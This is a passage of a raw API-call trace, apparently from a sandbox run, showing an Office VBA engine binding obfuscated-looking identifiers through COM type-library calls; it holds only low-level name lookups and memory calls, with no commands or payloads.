0xe [0069.441] IUnknown:Release (This=0x665ba50) returned 0xd [0069.441] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0069.441] IUnknown:Release (This=0xaf0b528) returned 0x4 [0069.441] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.441] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.441] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0069.441] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.441] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.441] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.441] IUnknown:Release (This=0x665ba50) returned 0xd [0069.441] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.441] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.441] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.442] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.442] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.442] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.442] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.442] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.442] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.442] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.442] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.442] IUnknown:Release (This=0x665ba50) returned 0xd [0069.442] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.442] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.442] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.442] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.442] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0069.442] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0069.442] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0069.442] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0069.442] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0069.442] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0069.442] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0069.442] IUnknown:Release (This=0x665ba50) returned 0xd [0069.443] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0069.443] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0069.443] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0069.443] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0069.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ae6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="woxGDZQ4") returned 9 [0069.443] ITypeComp:RemoteBind (in: This=0x665ba60, szName="woxGDZQ4", lHashVal=0x101f3b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ae6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="woxGDZQ4") returned 9 [0069.443] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="woxGDZQ4", lHashVal=0x101f3b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ae6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="woxGDZQ4") returned 9 [0069.443] ITypeComp:RemoteBind (in: This=0x665bd30, szName="woxGDZQ4", lHashVal=0x101f3b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.443] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="woxGDZQ4") returned 0x101f3b [0069.443] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="woxGDZQ4" | out: _Dst="woxGDZQ4") returned 0x0 [0069.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="woxGDZQ4") returned 9 [0069.443] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.443] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="woxGDZQ4", lHashVal=0x101f3b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.443] IUnknown:Release (This=0x665ba50) returned 0xd [0069.443] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.443] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="woxGDZQ4", lHashVal=0x101f3b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.443] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.443] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.443] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="woxGDZQ4", lHashVal=0x101f3b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.443] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.443] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.444] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="woxGDZQ4", lHashVal=0x101f3b, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.444] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80ae6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="woxGDZQ4") returned 9 [0069.444] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="woxGDZQ4", lHashVal=0x101f3b, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.444] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.444] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80ae6 | out: _Dst=0x67c2d40) returned 0x0 [0069.444] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_woxGDZQ4") returned 0x10f703 [0069.444] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_woxGDZQ4" | out: _Dst="_B_var_woxGDZQ4") returned 0x0 [0069.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_woxGDZQ4") returned 16 [0069.444] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.444] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_woxGDZQ4", lHashVal=0x10f703, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.444] IUnknown:Release (This=0x665ba50) returned 0xd [0069.444] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.444] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_woxGDZQ4", lHashVal=0x10f703, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.444] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.444] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.444] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_woxGDZQ4", lHashVal=0x10f703, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.444] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.444] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.444] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_woxGDZQ4", lHashVal=0x10f703, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.444] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.444] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.444] IUnknown:Release (This=0x665ba50) returned 0xd [0069.444] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12c5e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_woxGDZQ4") returned 16 [0069.444] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_woxGDZQ4", lHashVal=0x10f703, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x44004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x44004700000000, pDummy=0x0) returned 0x0 [0069.445] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80ae6 | out: _Dst=0x144ec0) returned 0x0 [0069.445] ITypeComp:RemoteBind (in: This=0x665ba60, szName="AoxDQQBU", lHashVal=0x105264, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80be2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="AoxDQQBU") returned 9 [0069.445] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="AoxDQQBU", lHashVal=0x105264, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80be2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="AoxDQQBU") returned 9 [0069.445] ITypeComp:RemoteBind (in: This=0x665bd30, szName="AoxDQQBU", lHashVal=0x105264, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.445] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="AoxDQQBU") returned 0x105264 [0069.445] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="AoxDQQBU" | out: _Dst="AoxDQQBU") returned 0x0 [0069.445] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="AoxDQQBU") returned 9 [0069.445] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.445] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="AoxDQQBU", lHashVal=0x105264, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.445] IUnknown:Release (This=0x665ba50) returned 0xd [0069.445] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.445] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="AoxDQQBU", lHashVal=0x105264, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.445] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.445] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.445] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="AoxDQQBU", lHashVal=0x105264, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.445] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.445] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.445] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="AoxDQQBU", lHashVal=0x105264, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.446] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80be2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="AoxDQQBU") returned 9 [0069.446] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="AoxDQQBU", lHashVal=0x105264, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.446] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.446] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80be2 | out: _Dst=0x67c2d40) returned 0x0 [0069.446] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_AoxDQQBU") returned 0x1029ed [0069.446] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_AoxDQQBU" | out: _Dst="_B_var_AoxDQQBU") returned 0x0 [0069.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_AoxDQQBU") returned 16 [0069.446] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.446] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_AoxDQQBU", lHashVal=0x1029ed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.446] IUnknown:Release (This=0x665ba50) returned 0xd [0069.446] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.446] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_AoxDQQBU", lHashVal=0x1029ed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.446] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.446] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.446] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_AoxDQQBU", lHashVal=0x1029ed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.446] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.446] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.446] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_AoxDQQBU", lHashVal=0x1029ed, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.446] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.446] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.446] IUnknown:Release (This=0x665ba50) returned 0xd [0069.446] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b12c8e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_AoxDQQBU") returned 16 [0069.446] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_AoxDQQBU", lHashVal=0x1029ed, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x51004400000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x41005f00720061, ppTypeComp=0x51004400000000, pDummy=0x0) returned 0x0 [0069.447] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80be2 | out: _Dst=0x144ec0) returned 0x0 [0069.447] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zUBBQ44x", lHashVal=0x10ff13, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80bb6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zUBBQ44x") returned 9 [0069.447] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zUBBQ44x", lHashVal=0x10ff13, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80bb6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zUBBQ44x") returned 9 [0069.447] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zUBBQ44x", lHashVal=0x10ff13, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.447] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zUBBQ44x") returned 0x10ff13 [0069.447] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="zUBBQ44x" | out: _Dst="zUBBQ44x") returned 0x0 [0069.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="zUBBQ44x") returned 9 [0069.447] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.447] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zUBBQ44x", lHashVal=0x10ff13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.447] IUnknown:Release (This=0x665ba50) returned 0xd [0069.447] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.447] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zUBBQ44x", lHashVal=0x10ff13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.447] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.447] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.447] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zUBBQ44x", lHashVal=0x10ff13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.447] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.447] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.447] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zUBBQ44x", lHashVal=0x10ff13, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.447] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.447] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80bb6, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="zUBBQ44x") returned 9 [0069.447] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="zUBBQ44x", lHashVal=0x10ff13, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.448] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.448] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80bb6 | out: _Dst=0x67c2d40) returned 0x0 [0069.448] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_zUBBQ44x") returned 0x10d69c [0069.448] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_zUBBQ44x" | out: _Dst="_B_var_zUBBQ44x") returned 0x0 [0069.448] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | 